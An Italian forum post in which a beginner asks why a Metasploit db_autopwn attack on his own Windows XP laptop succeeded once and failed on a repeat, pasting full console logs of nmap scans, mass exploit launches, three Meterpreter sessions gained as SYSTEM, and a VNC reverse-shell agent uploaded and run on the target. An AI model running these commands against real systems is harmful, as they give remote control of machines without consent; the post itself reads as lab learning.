Ciao a tutti,
Sono finalmente riuscito a portare a buon fine un attacco usando la funzione autopwn di metasploit da un portatile con BT4 r2 verso un acer aspire one con windows XP S3, entrambi collegati wi-fi ad uno stesso access point.

Il problema è che ho tentato di ripetere l’attacco giorni dopo (dopo aver spento entrambi i computer) con le stesse (credo) identiche condizioni del giorno precedente (cambiavano solo gli Ip), ma l’attacco non è andato a buon fine.

Ora, lavorando nel campo della ricerca come biochimico all’università, sono abituato a pensare in maniera scientifica per cui, secondo il ben noto “metodo scientifico”,se faccio un esperimento il giorno X e ottengo determinati risultati, facendo lo stesso esperimento nel giorno Y, nelle stesse condizioni, mi aspetto di ottenere gli stessi risultati.

Evidentemente c’è qualcosa che non torna…. mi piacerebbe capire perché il secondo attacco, effettuato con gli stessi passaggi non ha funzionato.

Ho provato l’autopwn perché, essendo alle prime armi, non so ancora riconoscere ed interpretare le possibili vulnerabilità rilevate dalla scansione con nmap, né a maggior ragione so decidere quali exploit conviene usare contro tali vulnerabilità….
So che sarebbe buona regola riuscire prima a capire le vulnerabilità e decidere poi in base a quelle l’attacco da usare… ho cercato in rete, ma fino ad ora ho trovato solo alcuni esempi su vecchie vulnerabilità e relativi exploit, che nel mio caso non hanno mai funzionato.
Mi piacerebbe sapere se esiste una guida completa (e comprensibile al neofita ;-)) tipoorta X, servizio Y: usare exploit: A, B, C.

La cosa più importante di tutte:
…mi piacerebbe ovviamente anche sapere se esiste un modo per capire quali exploit del mio autopwn hanno funzionato (si sono aperte ben 3 sessioni) e in che modo lo hanno fatto.

Posto qui, lo scenario e gli output di entrambi gli attacchi:
Attacker: samsung R450 con BT4 r2 connesso con Wi-Fi al mio Access Point.
Target: Acer Aspire One con Windows XP SP3 Firewall di XP DISATTIVATO connesso con Wi-Fi al mio AP.

primo attacco:

Code:
ATTACCO 1

msf > db_driver mysql
[*] Using database driver mysql

msf > db_connect root:toor@127.0.0.1/prova



msf > db_nmap 192.168.0.2 --osscan-guess -sV
[*] Nmap: Starting Nmap 5.35DC1 ( http://nmap.org ) at 2011-05-03 19:36 UTC
[*] Nmap: Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn
[*] Nmap: Nmap done: 1 IP address (0 hosts up) scanned in 0.33 seconds
msf > db_nmap 192.168.0.2 --osscan-guess -sV -Pn
[*] Nmap: Starting Nmap 5.35DC1 ( http://nmap.org ) at 2011-05-03 19:37 UTC
[*] Nmap: Nmap scan report for 192.168.0.2
[*] Nmap: Host is up (0.046s latency).
[*] Nmap: Not shown: 996 closed ports
[*] Nmap: PORT     STATE SERVICE      VERSION
[*] Nmap: 135/tcp  open  msrpc        Microsoft Windows RPC
[*] Nmap: 139/tcp  open  netbios-ssn
[*] Nmap: 445/tcp  open  microsoft-ds Microsoft Windows XP microsoft-ds
[*] Nmap: 2869/tcp open  http         Microsoft HTTPAPI httpd 1.0 (SSDP/UPnP)
[*] Nmap: MAC Address: 00:23:4E:2E:FC:C4 (Hon Hai Precision Ind. Co.)
[*] Nmap: Service Info: OS: Windows
[*] Nmap: Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 11.47 seconds

msf > db_hosts

Hosts
=====

address      mac                name  os_name  os_flavor  os_sp  purpose  info  comments
-------      ---                ----  -------  ---------  -----  -------  ----  --------
192.168.0.2  00:23:4E:2E:FC:C4        Unknown                    device

msf > db_autopwn -x -e -p -R great
[*] (1/101 [0 sessions]): Launching exploit/linux/http/ddwrt_cgibin_exec against 192.168.0.2:2869...
[*] (2/101 [0 sessions]): Launching exploit/windows/http/hp_nnm_getnnmdata_maxage against 192.168.0.2:2869...
[*] (3/101 [0 sessions]): Launching exploit/multi/samba/usermap_script against 192.168.0.2:139...
[*] (4/101 [0 sessions]): Launching exploit/windows/http/adobe_robohelper_authbypass against 192.168.0.2:2869...

......snip.....
[*] (99/101 [0 sessions]): Launching exploit/unix/webapp/openx_banner_edit against 192.168.0.2:2869...
[*] (100/101 [0 sessions]): Launching exploit/unix/webapp/tikiwiki_graph_formula_exec against 192.168.0.2:2869...
[*] (101/101 [0 sessions]): Launching exploit/windows/smb/netidentity_xtierrpcpipe against 192.168.0.2:445...
[*] (101/101 [0 sessions]): Waiting on 28 launched modules to finish execution...
[*] (101/101 [0 sessions]): Waiting on 14 launched modules to finish execution...
[*] (101/101 [0 sessions]): Waiting on 12 launched modules to finish execution...
[*] Meterpreter session 2 opened (192.168.0.3:34499 -> 192.168.0.2:32906) at Tue May 03 19:48:17 +0000 2011
[*] Meterpreter session 3 opened (192.168.0.3:39483 -> 192.168.0.2:9261) at Tue May 03 19:48:18 +0000 2011
[*] Meterpreter session 4 opened (192.168.0.3:32993 -> 192.168.0.2:27406) at Tue May 03 19:48:18 +0000 2011
[*] (101/101 [3 sessions]): Waiting on 8 launched modules to finish execution...
[*] (101/101 [3 sessions]): Waiting on 8 launched modules to finish execution...

.....snip.....
[*] (101/101 [3 sessions]): Waiting on 1 launched modules to finish execution...
[*] (101/101 [3 sessions]): Waiting on 0 launched modules to finish execution...


msf > sessions -i

Active sessions
===============

  Id  Type                   Information                            Connection
  --  ----                   -----------                            ----------
  2   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ ACER-88B18F6E0B  192.168.0.3:34499 -> 192.168.0.2:32906
  3   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ ACER-88B18F6E0B  192.168.0.3:39483 -> 192.168.0.2:9261
  4   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ ACER-88B18F6E0B  192.168.0.3:32993 -> 192.168.0.2:27406

msf > sessions -i 2
[*] Starting interaction with 2...


meterpreter > ps

Process list
============

 PID   Name                       Arch  Session  User                           Path
 ---   ----                       ----  -------  ----                           ----
 0     [System Process]
 4     System                     x86   0        NT AUTHORITY\SYSTEM
 632   smss.exe                   x86   0        NT AUTHORITY\SYSTEM            \SystemRoot\System32\smss.exe
 680   csrss.exe                  x86   0        NT AUTHORITY\SYSTEM            \??\C:\WINDOWS\system32\csrss.exe
 704   winlogon.exe               x86   0        NT AUTHORITY\SYSTEM            \??
....snip......

C:\WINDOWS\system32\wuauclt.exe
 3396  cmd.exe                    x86   0        ACER-88B18F6E0B\stefano        C:\WINDOWS\system32\cmd.exe
 1132  svchost.exe                x86   0        NT AUTHORITY\SYSTEM            C:\WINDOWS\System32\svchost.exe

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > run vnc
[*] Creating a VNC reverse tcp stager: LHOST=192.168.0.3 LPORT=4545)
[*] Running payload handler
[*] VNC stager executable 73802 bytes long
[*] Uploaded the VNC agent to C:\WINDOWS\TEMP\DAlZOGPWel.exe (must be deleted manually)
[*] Executing the VNC agent with endpoint 192.168.0.3:4545...

meterpreter > Connected to RFB server, using protocol version 3.8
Enabling TightVNC protocol extensions
No authentication needed
Authentication successful
Desktop name "acer-88b18f6e0b"
VNC server default format:
  32 bits per pixel.
  Least significant byte first in each pixel.
  True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0
Using default colormap which is TrueColor.  Pixel format:
  32 bits per pixel.
  Least significant byte first in each pixel.
  True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0
Using shared memory PutImage
Same machine: preferring raw encoding
ShmCleanup called

meterpreter > exit
secondo attacco:

Code:
ATTACCO 2

msf > db_driver mysql
[*] Using database driver mysql

msf > db_connect root:toor@127.0.0.1/prova1
msf > db_hosts

Hosts
=====

address  mac  name  os_name  os_flavor  os_sp  purpose  info  comments
-------  ---  ----  -------  ---------  -----  -------  ----  --------

msf > db_nmap 192.168.0.7 -sV --osscan-guess -Pn
[*] Nmap: Starting Nmap 5.35DC1 ( http://nmap.org ) at 2011-05-05 11:53 UTC
[*] Nmap: Nmap scan report for 192.168.0.7
[*] Nmap: Host is up (0.41s latency)
[*] Nmap: Not shown: 996 closed ports
[*] Nmap: PORT     STATE SERVICE      VERSION
[*] Nmap: 135/tcp  open  msrpc        Microsoft Windows RPC
[*] Nmap: 139/tcp  open  netbios-ssn
[*] Nmap: 445/tcp  open  microsoft-ds Microsoft Windows XP microsoft-ds
[*] Nmap: 2869/tcp open  http         Microsoft HTTPAPI httpd 1.0 (SSDP/UPnP)
[*] Nmap: MAC Address: 00:23:4E:2E:FC:C4 (Hon Hai Precision Ind. Co.)
[*] Nmap: Service Info: OS: Windows
[*] Nmap: Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 10.78 seconds

msf > db_hosts

Hosts
=====

address      mac                name  os_name  os_flavor  os_sp  purpose  info  comments
-------      ---                ----  -------  ---------  -----  -------  ----  --------
192.168.0.7  00:23:4E:2E:FC:C4        Unknown                    device

msf > db_autopwn -x -e -p -R great

[*] (1/100 [0 sessions]): Launching exploit/unix/webapp/coppermine_piceditor against 192.168.0.7:2869...

....snip....
[*] (100/100 [0 sessions]): Waiting on 0 launched modules to finish execution...

msf >
Grazie anticipatamente,
...please be patient (and exhaustive) with newbies!